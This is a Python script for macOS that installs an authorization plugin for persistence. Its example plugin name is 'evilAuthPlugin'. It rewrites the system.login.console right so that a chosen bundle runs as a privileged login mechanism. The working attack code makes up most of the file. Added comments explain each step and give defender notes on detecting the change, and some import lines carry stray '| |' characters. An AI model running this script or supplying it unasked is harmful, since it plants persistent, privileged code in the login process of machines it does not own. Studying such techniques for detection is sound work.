python script to install authorization plugin that requests system.login.console right
#!/usr/bin/python
# install authorization plugin for persistence.
# original script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py
# system.login.console right should be used for auth plugins
# ex: installplugin.py evilAuthPlugin
import sys | |
import objc | |
from ctypes import CDLL, c_void_p, byref, c_char_p | |
from ctypes.util import find_library | |
from PyObjCTools import Conversion | |
# Load Security.framework through ctypes and bind the three Authorization
# Services entry points used below. No argtypes/restype are declared, so
# ctypes applies its defaults and each call returns a plain C int.
Security = CDLL(find_library("Security.framework"))
AuthorizationCreate = Security.AuthorizationCreate
AuthorizationRightGet = Security.AuthorizationRightGet
AuthorizationRightSet = Security.AuthorizationRightSet
def authorization_right_get(right):
    """Return a mutable copy of the stored definition of *right*, or None.

    Calls AuthorizationRightGet with an out-pointer and, when the pointer
    comes back non-NULL, wraps it as a PyObjC object and returns its
    ``mutableCopy()``. The integer result of AuthorizationRightGet itself is
    not inspected; a NULL out-pointer is the only failure signal used here.
    """
    definition_ptr = c_void_p()
    AuthorizationRightGet(right, byref(definition_ptr))
    if not definition_ptr:
        return None
    wrapped = objc.objc_object(c_void_p=definition_ptr)
    return wrapped.mutableCopy()
def authorization_right_set(right, value):
    """Write *value* as the new definition of *right* and return the status.

    A fresh authorization reference is created with AuthorizationCreate and
    passed to AuthorizationRightSet together with the raw pointer behind the
    PyObjC object *value*. The return value is whatever AuthorizationRightSet
    returns. The result of AuthorizationCreate is not checked, and the
    reference is not released in this function.
    """
    session = c_void_p()
    AuthorizationCreate(None, None, 0, byref(session))
    definition_ptr = value.__c_void_p__()
    status = AuthorizationRightSet(session, right, definition_ptr, None, None, None)
    return status
if __name__ == '__main__':
    # What this entry point changes on the host: one extra entry in the
    # "mechanisms" list of the system.login.console right, placed directly
    # after "HomeDirMechanism:status". The entry has the form
    # "<bundle>:login,privileged".
    #
    # Defender notes: this edit persists in the authorization database and
    # is visible with `security authorizationdb read system.login.console`.
    # Comparing the mechanisms list against a known-good baseline, and
    # reviewing bundles under /Library/Security/SecurityAgentPlugins,
    # surfaces an unexpected entry of this kind.
    if len(sys.argv) < 2:
        # A single parenthesised string prints identically under the
        # Python 2 interpreter named in the shebang.
        print("Please provide the bundle name, without the extension")
        # Note: a usage error still exits with status 0.
        sys.exit(0)

    bundle = sys.argv[1]
    authright = "system.login.console"

    db = authorization_right_get(authright)
    # Position of the HomeDirMechanism:status entry; the new mechanism is
    # inserted right after it. No handling exists for a missing right
    # (db is None) or a missing anchor entry; either case raises here.
    i = db["mechanisms"].index("HomeDirMechanism:status")
    mechanismValue = u"{}:login,privileged".format(bundle)

    # The PyObjC object is converted to plain Python collections so the
    # list can be edited, then converted back to a property list.
    writeableDB = Conversion.pythonCollectionFromPropertyList(
        db, conversionHelper=None
    )
    writeableDB['mechanisms'].insert(i + 1, mechanismValue)
    db = Conversion.propertyListFromPythonCollection(
        writeableDB, conversionHelper=None
    )

    # Write the modified definition back. The returned status is ignored,
    # so "Done" is printed whether or not the update was accepted.
    authorization_right_set(authright, db)
    print("Done")